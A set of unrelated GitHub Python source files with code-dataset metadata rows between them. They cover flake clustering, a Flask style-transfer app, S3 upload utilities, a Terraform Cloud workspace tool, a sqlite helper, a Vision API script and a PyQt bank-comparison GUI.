self.ax.add_patch(rect)
if run_args['overlays']>=3:
# Cross hair and circle
rect = patches.Rectangle( (xc-size/2, yc), size, 0, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3) # Horizontal bar
self.ax.add_patch(rect)
rect = patches.Rectangle( (xc, yc-size/2), 0, size, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3) # Vertical bar
self.ax.add_patch(rect)
if run_args['overlays']>=5:
# Circle overlay denoting size
circ = patches.Circle(xy=(xc,yc), radius=size, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3)
self.ax.add_patch(circ)
def get_in_range(self, data, im_contrast, image_contrast_trim=None, **run_args):
if image_contrast_trim is not None:
image_contrast_trim = np.clip(image_contrast_trim, 0, 0.95)
avg = np.average(data)
avg /= 255
amt = image_contrast_trim
im_contrast = ( avg*amt , 1.0-(1.0-avg)*amt )
in_range = ( im_contrast[0]*255, im_contrast[1]*255 )
return in_range
class select_flakes(cluster):
def __init__(self, name='select_flakes', **kwargs):
self.name = self.__class__.__name__ if name is None else name
self.default_ext = '.pkl'
self.run_args = {
'file_extension' : '.pkl',
'force' : False,
'verbosity' : 3,
'num_jobs' : None,
'num_clusters' : 20,
'cluster_method' : 'selection',
'features' : 'all', # 'shape', 'color', 'all'
'feature_normed_range' : [-2, +2], # range for plotting the normed features
'bbox_pad' : 0.5,
'image_contrast' : (0, 1),
'image_contrast_trim' : None,
'overlays' : 3,
}
self.run_args.update(kwargs)
# WARNING: This association of features names is hard-coded, and is thus contingent
# on the current implementation of Protocols.py>flake_analysis
self.feature_names_color = [
'g contrast',
'v contrast',
'gray',
'gray std',
'H',
'S',
'V',
'H std',
'S std',
'V std',
'R',
'G',
'B',
'R std',
'G std',
'B std',
'entropy'
]
self.feature_names_color = self.feature_names_color + ['{}_inner'.format(f) for f in self.feature_names_color]
self.feature_names_shape = ['P/A'] + ['hist {}'.format(i) for i in range(15)] + ['fractal dimension']
@run_default
def run(self, datas, output_dir, basename, **run_args):
results = {}
# Load all flakes identified by "find_flakes" protocol
flakes = self.load_flakes(datas, **run_args)
if run_args['verbosity']>=4:
print(' {:,d} flakes identified in {:d} images'.format(len(flakes), len(datas)))
# Compute the rescaling of feature vectors
features_all_orig = self.load_features(flakes, **run_args)
rescale = StandardScaler()
features_all_rescaled = rescale.fit_transform(features_all_orig)
flakes_selected = self.select(flakes, features_all_orig, features_all_rescaled, **run_args)
features_orig = self.load_features(flakes_selected, **run_args)
feature_vector_orig = np.average(features_orig, axis=0)
feature_vector = rescale.transform( [feature_vector_orig] )[0]
features = rescale.transform(features_orig)
if run_args['verbosity']>=4:
print(" Selected {:,d} flakes using '{}'".format(len(flakes_selected), run_args['cluster_method']))
clustering = self.load_clustering(basename=basename, output_dir=output_dir, features_rescaled=features, **run_args)
self.plot_cluster(output_dir, cluster_name='selection', feature_vector=feature_vector, feature_vector_orig=feature_vector_orig, flakes_cluster=flakes_selected, features_cluster=features, distributions=clustering['distributions'], dist_bin_edges=clustering['dist_bin_edges'], rescale=rescale, **run_args)
return results
def extract_features(self, feature_name, flakes, flake_features, **run_args):
# Extract the specified feature, returning a list of that feature
# for the entire list of flakes
# Handle special case of relative standard deviation
if feature_name.endswith(' std_inner __relative'):
if run_args['verbosity']>=5:
print(" Computing {}".format(feature_name))
name = feature_name[:-len(' std_inner __relative')]
features = self.extract_features(name, flakes, flake_features, **run_args)
features_std = self.extract_features('{} std_inner'.format(name), flakes, flake_features, **run_args)
return features_std/features
elif feature_name.endswith(' std __relative'):
if run_args['verbosity']>=5:
print(" Computing {}".format(feature_name))
features = self.extract_features(feature_name[:-len(' std __relative')], flakes, flake_features, **run_args)
features_std = self.extract_features(feature_name[:-len(' __relative')], flakes, flake_features, **run_args)
return features_std/features
# Check if it appears as value associated with each flake object
if feature_name in flakes[0]:
if run_args['verbosity']>=5:
print(" Extracting {} from flakes".format(feature_name))
return np.asarray( [ f[feature_name] for f in flakes ] )
# Default: lookup in self.feature_names
i = self.feature_names.index(feature_name)
if run_args['verbosity']>=5:
print(" Extracting {} from flake_features, index {}".format(feature_name, i))
return flake_features[:,i]
def select(self, flakes, flake_features_orig, flake_features_rescaled, **run_args):
# Generate a list of boolean arrays, which are selecting flakes with
# features within the specified range
conditions = []
for key, value in run_args['selection'].items():
if run_args['verbosity']>=5:
print(" Adding condition: {} between {} and {}".format(key, value[0], value[1]))
if key.endswith(' __rescaled'):
features = self.extract_features(key[:-len(' __rescaled')], flakes, flake_features_rescaled, **run_args)
else:
features = self.extract_features(key, flakes, flake_features_orig, **run_args)
conditions.append( (features>=value[0]) )
conditions.append( (features<=value[1]) )
idx = np.where(np.all(conditions, axis=0))[0]
flakes = np.asarray(flakes)[idx]
if run_args['verbosity']>=3 and len(flakes)<1:
print("WARNING: Selection criteria too restrictive. (No flakes meet criteria.)")
return flakes
| CFN-softbio/SciAnalysis | SciAnalysis/ImAnalysis/Flakes/cluster.py | cluster.py | py | 42,216 | python | en | code | 19 | github-code | 36 | [
{
"api_name": "pickle.load",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "joblib.Parallel",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "joblib.delayed",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "itertools.chain.from_itera... |
14198442268 | import os
from flask import Flask, render_template, request
import base64
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import src.components.data_ingestion as DI
from src.components.model_trainer import modelTrain
from werkzeug.utils import secure_filename
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.abspath(os.path.join(os.path.dirname(__file__), 'static', 'uploads'))
content_dir = DI.default_content_dir
style_dir = DI.default_style_dir
@app.route('/')
def index():
# Get content and style image filenames from src/components/data directory
content_images = [f for f in os.listdir(content_dir) if f.endswith('.jpg' or '.png' or '.jpeg')]
style_images = [f for f in os.listdir(style_dir) if f.endswith('.jpg' or '.png' or '.jpeg')]
return render_template('index.html', content_images=content_images, style_images=style_images)
@app.route('/transfer', methods=['POST'])
def transfer_style():
# Retrieve user input from the form
epochs = int(request.form['epochs'])
learning_rate = float(request.form['learningRate'])
alpha = float(request.form['alpha'])
beta = float(request.form['beta'])
selected_source = request.form.get("imageSource")
content_image = request.form.get('contentImage')
style_image = request.form.get('styleImage')
if selected_source == 'default':
content_image_path = os.path.join(content_dir, content_image)
style_image_path = os.path.join(style_dir, style_image)
elif selected_source == 'custom_image':
custom_content = request.files.get('customContentImage')
content_image_filename = secure_filename(custom_content.filename)
content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
print("Content Image Path:", content_image_path)
custom_content.save(content_image_path)
style_image_path = os.path.join(style_dir, style_image)
elif selected_source == 'custom_style':
custom_style = request.files.get('customStyleImage')
style_image_filename = secure_filename(custom_style.filename)
style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
print("Style Image Path:", style_image_path)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
custom_style.save(style_image_path)
content_image_path = os.path.join(content_dir, content_image)
elif selected_source == 'custom':
custom_content = request.files.get('customContentImage')
content_image_filename = secure_filename(custom_content.filename)
content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
print("Content Image Path:", content_image_path)
custom_content.save(content_image_path)
custom_style = request.files.get('customStyleImage')
style_image_filename = secure_filename(custom_style.filename)
style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
print("Style Image Path:", style_image_path)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
custom_style.save(style_image_path)
# Perform style transfer
test = modelTrain(content_image_path, style_image_path)
generated_image = test.train(epochs=epochs, lr=learning_rate, alpha=alpha, beta=beta)
# Convert the generated image to base64 and pass it to the template
buffer = BytesIO()
plt.imshow(generated_image)
plt.axis('off')
plt.savefig(buffer, format='png', bbox_inches='tight', pad_inches=0)
buffer.seek(0)
img_str = base64.b64encode(buffer.getvalue()).decode('utf-8')
return render_template('result.html', img_data=img_str)
if __name__ == "__main__":
app.run(debug=True)
| al0nkr/style-transfer-nn | app.py | app.py | py | 3,973 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number"... |
16209163559 | import datetime
import os
import random
import string
from datetime import datetime
import requests
from boto3 import Session
from django.conf import settings
from django.conf.global_settings import MEDIA_ROOT
from market_backend.apps.accounts.models import Media
from market_backend.v0.accounts import serializers
class AccountsUtils:
"""
Utility methods related to Accounts Application
"""
@staticmethod
def get_user_full_name(user):
if isinstance(user, list):
user_name_list = ''
for i, _ in enumerate(user):
if i != 0:
user_name_list += ' / '
if _.first_name or _.last_name:
user_name_list += "{} {}".format(_.first_name, _.last_name)
user_name_list += "{}".format(_.username.split('@')[0])
return user_name_list
if user.first_name or user.last_name:
return "{} {}".format(user.first_name, user.last_name)
return "{}".format(user.username.split('@')[0])
@staticmethod
def get_readable_user_type(type):
return type.replace('_', ' ').lower().capitalize()
class FileUploadUtils(object):
@staticmethod
def getFileKey():
return ''.join(
random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(50))
@staticmethod
def deleteFile(key):
media = Media.objects.get(id=key)
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
my_bucket = s3.Bucket(settings.AWS_BUCKET_NAME)
response = my_bucket.delete_objects(
Delete={
'Objects': [
{
'Key': media.key
}
]
}
)
media.delete()
return response
@staticmethod
def getFileName(key):
try:
file = Media.objects.get(key=key)
return file.file_name
except Exception as e:
print(e)
return None
@staticmethod
def getContentType(extension, url=None):
if extension == 'pdf':
return 'application/pdf'
elif extension == 'png':
return 'image/png'
elif extension == 'jpeg' or extension == 'jpg':
return 'image/jpeg'
else:
return 'image/jpeg'
@staticmethod
def uploadFile(url):
filename = url.split("/")[-1]
fileextension = filename.split('.')[1]
file = requests.get(url).content
filepath = os.path.join(MEDIA_ROOT, filename)
with open(filepath, 'wb') as destination:
destination.write(file)
file = open(filepath, 'rb')
extension = FileUploadUtils.getContentType(fileextension)
valid_file = True
if extension is None:
valid_file = False
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
file_key = FileUploadUtils.getFileKey()
if valid_file:
res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType=extension,
ACL='public-read')
data = {'key': file_key, 'file_name': filename, 'is_link': True}
serializer = serializers.CreateFileUploadSerializer(data=data)
if serializer.is_valid():
serializer.save()
if os.path.isfile(filepath):
os.remove(filepath)
media = Media.objects.get(key=file_key)
return media
else:
return None
@staticmethod
def upload_file_by_file(file):
milli_sec = str(datetime.datetime.now())
filename = str(milli_sec) + '.pdf'
print(file)
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
file_key = FileUploadUtils.getFileKey()
res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType='application/pdf',
ACL='public-read')
data = {'key': file_key, 'file_name': filename, 'is_link': False}
serializer = serializers.CreateFileUploadSerializer(data=data)
if serializer.is_valid():
serializer.save()
media = Media.objects.get(key=file_key)
return media
@staticmethod
def get_url_from_media_object(media):
return settings.AWS_S3_BASE_LINK + media.key
| muthukumar4999/market-backend | market_backend/v0/accounts/utils.py | utils.py | py | 5,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.choice",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "string.ascii_uppercase",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "string.ascii_lowercase",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": ... |
8473901690 | #!/usr/bin/env python3
############
## https://gist.github.com/DevBOFH/7bd65dbcb945cdfce42d21b1b6bc0e1b
############
##
##
description = 'Terraform workspace tool. This tool can be used to perform CRUD operations on Terraform Cloud via their public API.'
version = "0.0.1"
import os
import re
import sys
import requests
import argparse
import json
ORGANIZATION = "TF_CLOUD_ORG_NAME"
HEADERS = {"Content-Type": "application/vnd.api+json"}
def load_api_credentials(rc_path="~/.terraformrc"):
with open(os.path.expanduser(rc_path)) as f:
m = re.search(r'token = "([^"]+)"', f.read())
if not m:
raise RuntimeError(f"Unable to load credentials from {rc_path}")
else:
HEADERS["Authorization"] = f"Bearer {m.group(1)}"
def new_workspace(workspace_name):
PAYLOAD = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
req = requests.post(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def show_workspace(workspace_name):
req = requests.get(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
sys.exit(0)
pretty_json = json.loads(req.text)
print (json.dumps(pretty_json, indent=2))
def configure_workspace_by_name(workspace_name):
PAYLOAD = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
req = requests.patch(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def configure_workspace_by_id(workspace_id):
PAYLOAD = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
req = requests.patch(
f"https://app.terraform.io/api/v2/workspaces/{workspace_id}",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def configure_all_workspaces():
next_page = "https://app.terraform.io/api/v2/organizations/" + ORGANIZATION + "/workspaces"
while next_page:
page = requests.get(next_page, headers=HEADERS).json()
for i in page["data"]:
ws_id = i["id"]
ws_name = i["attributes"]["name"]
print(f"Updating {ws_name}")
try:
configure_workspace_by_id(i["id"])
except requests.exceptions.HTTPError as exc:
print(f"Error updating {ws_id} {ws_name}: {exc}", file=sys.stderr)
next_page = page["links"].get("next")
def delete_workspace(workspace_name):
PAYLOAD = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
req = requests.delete(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
if __name__ == "__main__":
# init argparse
parser = argparse.ArgumentParser(description = description)
parser.add_argument("-V", "--version", help="show version", action="store_true")
parser.add_argument("-n", "--new", help="create a new workspace")
parser.add_argument("-c", "--configure", help="configure a workspace to use local execution mode")
parser.add_argument("-ca", "--configureall", help="configure all workspaces to use local execution mode", action="store_true")
parser.add_argument("-d", "--delete", help="delete a workspace")
parser.add_argument("-s", "--show", help="show details of a workspace")
# read arguments from the command line
args = parser.parse_args()
# load terraform cloud api token
load_api_credentials()
# check for --version or -V
if args.version:
print("Terraform Workspace Tool " + version )
# check for --new or -n
if args.new:
try:
new_workspace(args.new)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --show or -s
if args.show:
try:
show_workspace(args.show)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configure or -c
if args.configure:
try:
configure_workspace_by_name(args.configure)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configureall or -ca
if args.configureall:
try:
configure_all_workspaces()
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --delete or -d
if args.delete:
try:
delete_workspace(args.delete)
except AssertionError as err:
print (str(err))
sys.exit(2)
####################################
##
##
| babywyrm/sysadmin | terraform/tf_workspace_.py | tf_workspace_.py | py | 5,404 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "os.path.expanduser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_n... |
35876191865 | import sqlite3
from sqlite3 import Error
class Key:
def __init__(self, key,content,info, database_path):
if database_path!="":
try:
self.key = key
self.database_path =database_path
if not self.check_key_exists():
if len(self.get_all__key(key))==0:
if key!="":
self.create_key(key,content,info)
else:
self.update_key(key,content,info)
except Error as e:
print(e)
def check_key_exists(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT id FROM os WHERE key like '%'+?+'%'", (self.key,))
exists = cursor.fetchone()
conn.close()
if exists is None:
return False
else:
return True
def get_all__key(self, key):
a=[]
if self.database_path!="":
conn = sqlite3.connect(self.database_path)
if key!="":
cur = conn.cursor()
cur.execute("SELECT * FROM os", () )
rows = cur.fetchall()
for row in rows:
#print("s",row[1])
if key in row[1]:
a.append(row[1])
return a
return a;
def find_key_content(self, key):
conn = sqlite3.connect(self.database_path)
a=[]
if key!='':
cur = conn.cursor()
cur.execute("SELECT * FROM os WHERE key=?", (key,) )
rows = cur.fetchall()
for row in rows:
#print("s",row[2])
return row[2]
if key in row[2]:
a.append(row[2])
return a
def delete_key(self,key):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM os WHERE key=?", (key,))
conn.commit()
conn.close()
except Error as e:
print(e)
def create_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
print(str(len(self.get_all__key(key))))
if len(self.get_all__key(key))==0:
cursor.execute("INSERT INTO os (key,content,info) VALUES (?,?,?)", (key,content,info))
conn.commit()
conn.close()
except Error as e:
print(e)
def update_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("UPDATE os SET content=?,info=? WHERE key=?", (content,info,key))
conn.commit()
conn.close()
except Error as e:
print(e)
def get_key(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT key FROM os WHERE key=?", (self.key,))
| dahstar/xwx.ctflab | fldb.py | fldb.py | py | 2,775 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.Error",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"... |
33738820247 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
db = SQLAlchemy()
def create_app():
app = Flask(__name__)
cors = CORS(app)
app.config["FLASK_DEBUG"] = True
app.config['SECRET_KEY'] = 'secret-key-goes-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'
from .models import Result, Patient, DeliveryReports
db.init_app(app)
with app.app_context():
db.create_all()
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app
| KariukiAntony/MMUST-HealthIT-TAT-App | app/__init__.py | __init__.py | py | 571 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "main.main",
... |
38075605873 | # -*- coding: utf-8 -*-
from pathlib import Path
class Manager:
def create_readme():
root_path = Path(__file__).parent
info ="""## حل سوالات کوئرا
برای دیدن صفحه ی اصلی هر سوال در سایت کوئرا میتوانید روی نام هر سوال کلیک کنید و یا در قسمت توضیحات روی PDF کلیک کنید.
showmeyourcode.ir
"""
table_header = [
"شماره سؤال",
"نام سؤال",
"youtube",
"لینک جواب",
"توضیحات",
]
with open('README.md',"w",encoding="utf8") as main_readme:
main_readme.write(info+'\n')
main_readme.write("|"+"|".join(table_header)+"|"+'\n')
main_readme.write("|-"*len(table_header)+"|"+'\n')
index=1
for question_path in root_path.glob(r"*/"):
if not question_path.is_file() and not str(question_path.relative_to(root_path)).startswith("."):
main_readme.write(f"|{index}")
# main_readme.write("|"+str(question_path.relative_to(root_path)))
with open(str(question_path.joinpath("readme.md")),"r",encoding="utf8") as local_readme:
main_readme.write("|"+local_readme.readline().strip())
main_readme.write("|"+local_readme.readline().strip())
main_readme.write("|")
for language in question_path.glob("*"):
if language.is_dir():
readme_path = str(language.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[{str(language.relative_to(question_path))}]({readme_path}), ")
main_readme.write("|")
for local_readmes in question_path.glob("*.md"):
if local_readmes.is_file():
readme_path = str(local_readmes.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[readme]({readme_path}), ")
for pdfs in question_path.glob("*.pdf"):
if pdfs.is_file():
pdf = str(pdfs.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[pdf]({pdf}), ")
main_readme.write("|\n")
index+=1
if __name__ == "__main__":
Manager.create_readme()
| MohammadNPak/quera.ir | manage.py | manage.py | py | 2,594 | python | en | code | 40 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
}
] |
31920197231 | from google.cloud import vision
# with 開始から終了まで自動で実行してくれる
# rb read binaryモード バイナリーモードを読み込む
# テキスト以外のデータ 主に画像や動画
# road.jpgを開いて読み込む
with open('./road.jpg', 'rb') as image_file:
content = image_file.read()
# vision APIが扱える画像データに変換
image = vision.Image(content=content)
# annotation テキストや音声、画像などあらゆる形式のデータにタグ付けをする作業
# client データを扱う人、もの
# ImageAnnotatorClientのインスタンスを生成
annotater_client = vision.ImageAnnotatorClient()
response_data = annotater_client.label_detection(image=image)
labels = response_data.label_annotations
print('----RESULT----')
for label in labels:
print(label.description, ':', round(label.score * 100, 2), '%')
print('----RESULT----')
| yuuki-1227/vision-ai-test | index.py | index.py | py | 916 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "google.cloud.vision.Image",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "google.cloud.vision",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "google.cloud.vision.ImageAnnotatorClient",
"line_number": 17,
"usage_type": "call"
},
{... |
39939114136 | from PyQt5.QtWidgets import QTableWidgetItem, QLabel, QFileDialog
from PyQt5.QtCore import Qt
from pandas.tests.io.excel.test_xlrd import xlwt
from UI.resultWinUI import *
from algorithm import *
from UI.mainWinUI import *
class BrokerWin(Ui_MainWindow, QtWidgets.QMainWindow):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setupUi(self)
self.setFixedSize(1100, 540)
self.fizButton.clicked.connect(self.sendInputFiz)
self.bizButton.clicked.connect(self.sendInputBiz)
self.selectAll.clicked.connect(self.selectAllFiz)
self.selectAll_2.clicked.connect(self.selectAllBiz)
def sendInputFiz(self):
banks.clear()
black_list.clear()
optional_fiz['Осуществление автоплатежей'] = self.autoPayments.isChecked()
optional_fiz['Перевод за рубеж'] = self.foreignTransfer.isChecked()
optional_fiz['Создание автоперевода'] = self.createAutoPayments.isChecked()
optional_fiz['Новости системы банка онлайн'] = self.news.isChecked()
optional_fiz['Автострахование'] = self.insuranceAuto.isChecked()
optional_fiz['Страхование недвижимости'] = self.insuranceEstate.isChecked()
optional_fiz['Страхование путешественников'] = self.insuranceTravellers.isChecked()
optional_fiz['Страхование пассажиров'] = self.insurancePassangers.isChecked()
optional_fiz['Наличие мобильного приложения'] = self.mobileApp.isChecked()
optional_fiz['Открытие брокерского счета'] = self.brokerAccount.isChecked()
ranked_fiz['Переводы на карту'] = self.transferToClient_fiz_SpinBox.value()
ranked_fiz['Минимальная сумма вклада'] = self.depositSum_fiz_SpinBox.value()
ranked_fiz['Процент по вкладу '] = self.persentDepozit_fiz_SpinBox.value()
ranked_fiz['Сумма кредита'] = self.creditSum_fiz_SpinBox.value()
ranked_fiz['Ставка кредита'] = self.percentCredit_fiz_SpinBox.value()
ranked_fiz['Переводы на карты по номеру телефона'] = self.transferNumber_fiz_SpinBox.value()
choose_necessary('fiz')
choose_ranked('fiz')
kind_of_sort = self.sort_fiz.currentText()
# self.close()
if kind_of_sort == "Пользовательскому рейтингу":
self.Open = ResultWin("По рейтингу")
elif kind_of_sort == "Кредитным условиям":
self.Open = ResultWin("по кредиту")
elif kind_of_sort == "Условиям по вкладам":
self.Open = ResultWin("по вкладу")
self.Open.show()
# print(special_sort('По рейтингу'))
def sendInputBiz(self):
banks.clear()
black_list.clear()
optional_biz['Мобильное приложение'] = self.mobileApp_biz.isChecked()
optional_biz['Торговый эквайринг'] = self.trade_biz.isChecked()
optional_biz['Мобильный эквайринг'] = self.mobileTrade_biz.isChecked()
optional_biz['Онлайн-бухгалтерия'] = self.onlineAccounting_biz.isChecked()
optional_biz['Проверка контрагентов'] = self.checkAgents_biz.isChecked()
optional_biz['Управление корпоративными картами'] = self.cards_biz.isChecked()
optional_biz['Финансовая аналитика'] = self.analitics_biz.isChecked()
optional_biz['Техподдержка клиентов 24/7'] = self.clientSupport_biz.isChecked()
optional_biz['Персональный менеджер'] = self.personalManager_biz.isChecked()
ranked_biz['Стоимость обслуживания'] = self.mounthPayment_biz_SpinBox.value()
ranked_biz['% за снятие наличных'] = self.cashComission_biz_SpinBox.value()
ranked_biz['% за внесение наличных'] = self.cashInputComission_biz_SpinBox.value()
ranked_biz['Лимит перевода на карту физ.лица'] = self.transfer_biz_SpinBox.value()
choose_necessary('biz')
choose_ranked('biz')
kind_of_sort = self.sort_biz.currentText()
# self.close()
if kind_of_sort == "Пользовательскому рейтингу":
self.Open = ResultWin("По рейтингу")
elif kind_of_sort == "Стоимости обслуживания":
self.Open = ResultWin("По обслуживанию в месяц")
self.Open.show()
def selectAllFiz(self):
self.autoPayments.setChecked(True)
self.foreignTransfer.setChecked(True)
self.createAutoPayments.setChecked(True)
self.news.setChecked(True)
self.insuranceAuto.setChecked(True)
self.insuranceEstate.setChecked(True)
self.insuranceTravellers.setChecked(True)
self.insurancePassangers.setChecked(True)
self.mobileApp.setChecked(True)
self.brokerAccount.setChecked(True)
def selectAllBiz(self):
self.mobileApp_biz.setChecked(True)
self.trade_biz.setChecked(True)
self.mobileTrade_biz.setChecked(True)
self.onlineAccounting_biz.setChecked(True)
self.checkAgents_biz.setChecked(True)
self.cards_biz.setChecked(True)
self.analitics_biz.setChecked(True)
self.clientSupport_biz.setChecked(True)
self.personalManager_biz.setChecked(True)
class ResultWin(Ui_ResultWindow, QtWidgets.QMainWindow):
def __init__(self, type_of_sort, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setupUi(self)
self.setFixedSize(930, 900)
self.type_of_sort = type_of_sort
self.showResult()
def showResult(self):
result = special_sort(self.type_of_sort)
i = 0
self.sites=[]
information = pd.read_csv("files/banks_info.csv", encoding="cp1251", sep=";")
for key in result.keys():
for bank in result[key]:
self.tableWidget.insertRow(i)
label = QLabel()
item = QTableWidgetItem(str(key))
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 0, item)
self.tableWidget.setItem(i, 1, QTableWidgetItem(bank))
self.sites.append(information[bank][0])
label.setText('<a href="'+information[bank][0]+'">'+information[bank][0]+'</a>')
label.setOpenExternalLinks(True)
self.tableWidget.setCellWidget(i, 2, label)
self.tableWidget.setItem(i, 3, QTableWidgetItem(information[bank][1]))
item=QTableWidgetItem(information[bank][2])
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 4, item)
item = QTableWidgetItem(information[bank][3])
item.setTextAlignment(Qt.AlignHCenter)
self.tableWidget.setItem(i, 5, item)
i += 1
self.tableWidget.resizeColumnsToContents()
self.importButton.clicked.connect(self.savefile)
style = "::section {""background-color: #ffc02b; font:10pt; }"
self.tableWidget.horizontalHeader().setStyleSheet(style)
def savefile(self):
filename, _ = QFileDialog.getSaveFileName(self, 'Save File', '', ".xls(*.xls)")
wbk = xlwt.Workbook()
sheet = wbk.add_sheet("sheet", cell_overwrite_ok=True)
style = xlwt.XFStyle()
model = self.tableWidget.model()
for c in range(model.columnCount()):
text = model.headerData(c, QtCore.Qt.Horizontal)
sheet.write(0, c , text, style=style)
for c in range(model.columnCount()):
for r in range(model.rowCount()):
text = model.data(model.index(r, c))
sheet.write(r + 1, c, text)
for r in range(model.rowCount()):
text = self.sites[r]
sheet.write(r + 1, 2, text)
wbk.save(filename)
| JuliaZimina/Remote-Banking-Brokers | UI/brokerUI.py | brokerUI.py | py | 8,392 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QLabel",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QTableWidgetItem",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtCore.Qt.AlignHCenter",
"line_number": 125,
"usage_type": "attribute"
... |
15672387350 | from clearpath_config.common.types.config import BaseConfig
from clearpath_config.common.types.list import OrderedListConfig
from clearpath_config.common.utils.dictionary import flip_dict
from clearpath_config.mounts.types.fath_pivot import FathPivot
from clearpath_config.mounts.types.flir_ptu import FlirPTU
from clearpath_config.mounts.types.mount import BaseMount
from clearpath_config.mounts.types.pacs import PACS
